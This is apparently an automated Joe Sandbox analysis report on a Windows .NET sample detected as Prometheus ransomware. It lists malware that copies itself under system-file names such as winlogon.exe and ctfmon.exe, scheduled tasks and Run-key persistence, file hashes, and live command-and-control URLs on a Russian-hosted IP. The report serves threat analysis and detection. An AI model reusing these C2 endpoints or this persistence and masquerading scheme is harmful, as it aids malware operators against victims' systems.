Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
B9exXW7c3t.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
B9exXW7c3t.exe	100%	Avira	HEUR/AGEN.1323342
B9exXW7c3t.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\Public\AccountPictures\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Windows Mail\ctfmon.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\Default\Links\ApplicationFrameHost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	100%	Joe Sandbox ML
C:\Users\Public\AccountPictures\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Mail\ctfmon.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	100%	Joe Sandbox ML
C:\Users\Default\Links\ApplicationFrameHost.exe	100%	Joe Sandbox ML
C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Mail\ctfmon.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\Links\ApplicationFrameHost.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\Saved Games\QeWHGGzCXwoQygZUiDI.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Public\AccountPictures\RuntimeBroker.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus

Source	Detection	Scanner	Label
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT	100%	Avira URL Cloud	malware
http://82.146.61.164	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Long	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3	100%	Avira URL Cloud	malware
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3	true	Avira URL Cloud: malware	unknown
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Long	ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://82.146.61.164	QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2043423134.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2043423134.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	B9exXW7c3t.exe, 00000000.00000002.2023417505.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2043423134.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
82.146.61.164	unknown	Russian Federation		29182	THEFIRST-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430334
Start date and time:	2024-04-23 14:46:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	B9exXW7c3t.exe renamed because original name is a hash value
Original Sample Name:	13aeda86aafde4051d7ca9280dac9a67.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@39/30@0/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ApplicationFrameHost.exe, PID 3808 because it is empty
Execution Graph export aborted for target ApplicationFrameHost.exe, PID 5612 because it is empty
Execution Graph export aborted for target B9exXW7c3t.exe, PID 5880 because it is empty
Execution Graph export aborted for target QeWHGGzCXwoQygZUiDI.exe, PID 1196 because it is empty
Execution Graph export aborted for target QeWHGGzCXwoQygZUiDI.exe, PID 2796 because it is empty
Execution Graph export aborted for target QeWHGGzCXwoQygZUiDI.exe, PID 4124 because it is empty
Execution Graph export aborted for target QeWHGGzCXwoQygZUiDI.exe, PID 7760 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 1084 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 6648 because it is empty
Execution Graph export aborted for target ctfmon.exe, PID 5644 because it is empty
Execution Graph export aborted for target ctfmon.exe, PID 6304 because it is empty
Execution Graph export aborted for target ctfmon.exe, PID 8060 because it is empty
Execution Graph export aborted for target winlogon.exe, PID 7176 because it is empty
Execution Graph export aborted for target winlogon.exe, PID 7208 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: B9exXW7c3t.exe

Simulations

Behavior and APIs

Time	Type	Description
14:46:55	Task Scheduler	Run new task: ApplicationFrameHost path: "C:\Users\Default\Links\ApplicationFrameHost.exe"
14:46:55	Task Scheduler	Run new task: ApplicationFrameHostA path: "C:\Users\Default\Links\ApplicationFrameHost.exe"
14:46:55	Task Scheduler	Run new task: ctfmon path: "C:\Program Files\Windows Mail\ctfmon.exe"
14:46:55	Task Scheduler	Run new task: ctfmonc path: "C:\Program Files\Windows Mail\ctfmon.exe"
14:46:55	Task Scheduler	Run new task: QeWHGGzCXwoQygZUiDI path: "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
14:46:55	Task Scheduler	Run new task: QeWHGGzCXwoQygZUiDIQ path: "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
14:46:55	Task Scheduler	Run new task: RuntimeBroker path: "C:\Users\Public\AccountPictures\RuntimeBroker.exe"
14:46:55	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Users\Public\AccountPictures\RuntimeBroker.exe"
14:46:55	Task Scheduler	Run new task: winlogon path: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
14:46:55	Task Scheduler	Run new task: winlogonw path: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
14:46:55	API Interceptor	4x Sleep call for process: QeWHGGzCXwoQygZUiDI.exe modified
14:46:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
14:46:58	API Interceptor	3x Sleep call for process: ApplicationFrameHost.exe modified
14:47:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Program Files\Windows Mail\ctfmon.exe"
14:47:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
14:47:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\AccountPictures\RuntimeBroker.exe"
14:47:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default\Links\ApplicationFrameHost.exe"
14:47:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
14:47:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Program Files\Windows Mail\ctfmon.exe"
14:47:55	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
14:48:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\AccountPictures\RuntimeBroker.exe"
14:48:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default\Links\ApplicationFrameHost.exe"
14:48:22	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run QeWHGGzCXwoQygZUiDI "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
14:48:30	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Program Files\Windows Mail\ctfmon.exe"
14:48:39	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
14:48:47	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\AccountPictures\RuntimeBroker.exe"
14:48:56	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default\Links\ApplicationFrameHost.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEFIRST-ASRU	pQTmpNQX2u.exe	Get hash	malicious	DCRat	Browse	82.146.47.35
	8CDSiIApNr.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	91.240.84.178
	YrwQEQwAlQ.elf	Get hash	malicious	Mirai	Browse	62.109.30.185
	https://steam.workshopfiles.com/sharedfiles/filedetails/m4a4_celestial_moon	Get hash	malicious	Unknown	Browse	77.246.158.18
	MT103 Remittance.vbs	Get hash	malicious	FormBook	Browse	82.202.172.184
	https://steam.workshopfiledetail.com/sharedfiles/filedetails/m4a4_celestial_moon	Get hash	malicious	Unknown	Browse	188.120.227.194
	1tQ7HC6GOS.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	62.109.7.175
	7GTGpZi6oi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	212.109.198.52
	W2HGvAuNRe.exe	Get hash	malicious	DCRat	Browse	212.109.193.246
	IDTVfeIKcu.elf	Get hash	malicious	Unknown	Browse	62.109.18.37

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with very long lines (360), with no line terminators
Category:	dropped
Size (bytes):	360
Entropy (8bit):	5.871212952072143
Encrypted:	false
SSDEEP:	6:x5+crhgGBG8lmcyKhaBLRprySjdWUCH0VcX711+MsFAXOLtOnMocc7TttKmQIySO:x5+c2AG8Xha998UEscXZ1+MGAXOLyc0o
MD5:	109ED1C52455D4A947D0B3CF30CDB688
SHA1:	05F8B335F1D719A86E54B6328883F8E82F9BDA98
SHA-256:	1A0F6312F73AD92B158C3582E251CBA3091CE7A42591EE2A0B2EAB6BD71F5A90
SHA-512:	4B24049338AD971E8F9BFC0E23F9F07B39DCC109CDE34533414B7AAEDC2860AD3C1A330A60A73E737226C7A73A4F1CBFB83B1A4AE7EE735DE8A1DB7F4FB9B421
Malicious:	false
Preview:	CNtudeUzQesWWVFEHoJm98e0LYNaYYPE5nEWFvxkW2VJkDwSB48MeBWDt3jFQ3b2OnasRs9W0iPHnUQIl5ZdZDj4RBnLMsUcbc56mDBS5mV6vPZYnadUe7cLEgbPFxJINxpLZTfh4HixrmIBlOivO98d9t2GmvMHcMs7jO8T55aWZodbXZo0PY3OzMLpbY5J4aVf4KcXPO0TilEUQbsNHV2DSeIXDT1gARc8T8gN6RkAikpOH0ZAqsBjiRMZCFT6WTSRJGBS4fQ0u1fsy3PM310SP2aBvHK17ooORXFBzHGKbLyrwelIzHCfdACQqAgxUY3GNQaayOXwup0DEsORfCCzlIvRVzVykTzDSreg

C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Microsoft\OneDrive\ListSync\2e26acd4fd0504

Download File

